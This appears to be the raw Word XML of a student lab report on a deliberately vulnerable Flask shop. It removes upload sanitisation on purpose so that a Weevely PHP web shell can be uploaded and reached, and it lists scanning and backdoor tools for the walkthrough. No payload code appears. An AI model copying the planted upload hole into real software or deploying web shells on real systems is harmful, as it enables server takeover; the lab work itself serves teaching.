    <w:p w14:paraId="3B18B58C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">complete system takeover </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF99D1E" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D12">
        <w:t>overloaded file system or database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D58E6" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">forwarding attacks to back-end systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17183098" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D12">
        <w:t>client-side attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D042C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D12">
        <w:t>defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65D45E" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">service disruption </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990DF75" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="005F2D12" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>The severity of the effects</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> depend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> largely</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> on what the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> application does with the uploaded file and particularly </w:t>
      </w:r>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> stor</w:t>
      </w:r>
      <w:r>
        <w:t>age location</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D96605" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">There are really two classes of problems here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B917B" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="005F2D12" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="005F2D12">
        <w:t>The first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> issue</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> is with the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uploaded </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t>file metadata, like the file name and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> path</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t>. Th</w:t>
      </w:r>
      <w:r>
        <w:t>is is</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> generally provided </w:t>
      </w:r>
      <w:r>
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> the transport</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">, such as HTTP multi-part encoding. This data </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> fool the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">application into overwriting a crucial file or storing the file in a dangerous location. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2278CFFC" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="005F2D12" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:t>second</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> class of </w:t>
      </w:r>
      <w:r>
        <w:t>issue</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> is with the file size </w:t>
      </w:r>
      <w:r>
        <w:t>and its</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve"> content. The </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">almost innumerable </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">range of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">potential </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">problems here depend wholly on </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the designed purpose of the code and </w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t>what the file is used f</w:t>
      </w:r>
      <w:r>
        <w:t>or on the target system</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D12">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1463112425"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION OWA22 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (OWASP, 2022)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="0FCFC826" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313E1440" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUGGESTED IMPLEMENTATION METHOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359BA8CD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Exploitation of profile image upload on the user registration form. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA79A3D" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="00D63AAF">
        <w:t xml:space="preserve">first of all </w:t>
      </w:r>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AAF">
        <w:t xml:space="preserve"> need</w:t>
      </w:r>
      <w:r>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AAF">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:t>amend</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AAF">
        <w:t xml:space="preserve"> the flaskecommerce.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to use apache as below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4E0DD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="00D63AAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F3110B" wp14:editId="733FB8C4">
            <wp:extent cx="6623050" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6623050" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C35BCC" w14:textId="48F2FFB7" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="00D63AAF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">second thing, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63AAF">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63AAF">
        <w:t xml:space="preserve"> was not installed</w:t>
      </w:r>
      <w:r w:rsidR="002E43AE">
        <w:t xml:space="preserve"> by default</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AAF">
        <w:t xml:space="preserve"> on the server</w:t>
      </w:r>
      <w:r w:rsidR="002E43AE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A56EF6" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="00D63AAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE1943C" wp14:editId="0200A681">
            <wp:extent cx="5924550" cy="5810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24550" cy="581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EA2A4" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Since now apache deals with it, next, from the flask server remove the static/image root. Ensuring to restart the apache2 services upon completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D59E7" w14:textId="2D48EAD2" w:rsidR="00F22AF0" w:rsidRPr="00D63AAF" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">As there was an issue with uploading php files to the server, and the dual extension (e.g. shell.php.jpg) technique proved unsuccessful.  there was a need to remove the file sanitisation on the user registration form profile upload, so now you can upload directly the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283ED90C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="009072EF" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FUNCTIONALITY TESTING</w:t>
      </w:r>
      <w:r w:rsidRPr="009072EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E196B04" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:bookmarkStart w:id="0" w:name="_Hlk99519054"/>
      <w:r>
        <w:t>Login as existing user: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B4123" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Register new user: server error (now resolved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E9689" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Browse site: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91CFCD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Add products to shopping cart: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDBF01" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Complete purchase: successful</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="3CF532A6" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E005B22" wp14:editId="1EB51101">
            <wp:extent cx="5727700" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="137" name="Picture 13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7700" cy="2997200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A4E75E" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk99518204"/>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="424CCB8D" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Implementation is for the most part successful as can be seen in the bellow image where I successfully browsed to the page where the shell is stored. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1729C83A" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="235A2244" wp14:editId="53E14871">
            <wp:extent cx="5727700" cy="1289050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="138" name="Picture 1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 email&#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7700" cy="1289050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E74D63" w14:textId="79D333CF" w:rsidR="003001C2" w:rsidRDefault="003001C2" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46949F0C" w14:textId="77777777" w:rsidR="00A40517" w:rsidRDefault="00A40517" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36777DDE" w14:textId="26B9F264" w:rsidR="00F22AF0" w:rsidRPr="00CA3121" w:rsidRDefault="00F22AF0" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FILE UPLOAD VULNERABILITY/EXPLOIT WALKTHROUGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36758778" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk99518230"/>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TOOLS REQUIRED:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="55DAD08C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu webserver/flaskecommerce vm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F6F6A" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kali vm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E20635" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zenmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714EAC7" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="004B1E55" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve">he official </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GUI version of the </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>Nmap Security Scanner. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) open source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve">free </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to use </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. It’s </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>aim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> to make </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the often complex commands of </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> more</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">easily </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">used by novices to the software, </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> providing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the more</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> advanced features experienced Nmap users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are accustomed to</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>. Frequently used scans can be s</w:t>
      </w:r>
      <w:r>
        <w:t>tored</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> as profiles to make repeatedly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> running them more </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accessable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dedicated </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve">command creator </w:t>
      </w:r>
      <w:r>
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> interactive concept</w:t>
      </w:r>
      <w:r>
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> of Nmap command lines. Scan results can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> be saved </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>later</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t>. Saved scan results can be compared to see how</w:t>
      </w:r>
      <w:r>
        <w:t>/if</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> they differ. The results </w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5BD8">
        <w:t xml:space="preserve"> recent scans are stored in a searchable database.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidRPr="008500D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/zenmap/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="787FD817" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Dirbuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91D7AD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="004B1E55" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="008500D0">
        <w:t>DirBuster is a penetration testing tool with a Graphic User Interface (GUI) that is used to brute force directories and file names on web and application servers.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It can be run purely as a brute for tool or with the addition of a wordlist to simplify scanning. Specific file types and identifiers can also be scanned for. The resulting scan presents a breakdown of any discovered web application structure and contents. </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidRPr="003100DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cryptokait.com/2020/03/04/a-beginners-guide-to-scanning-with-dirbuster-for-the-ncl-games/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="050BE24A" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weevely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4ED93" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="004B1E55" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="008500D0">
        <w:t xml:space="preserve">Weevely is a stealth PHP web shell </w:t>
      </w:r>
      <w:r>
        <w:t>used to</w:t>
      </w:r>
      <w:r w:rsidRPr="008500D0">
        <w:t xml:space="preserve"> simulate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="008500D0">
        <w:t xml:space="preserve"> telnet-like connection. It is an essential tool for web application exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Weevely can be used to generate shells and backdoors as well as be utilized as the listener to connect back to and control the generated file. </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidRPr="003100DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.kali.org/tools/weevely/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BC19924" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
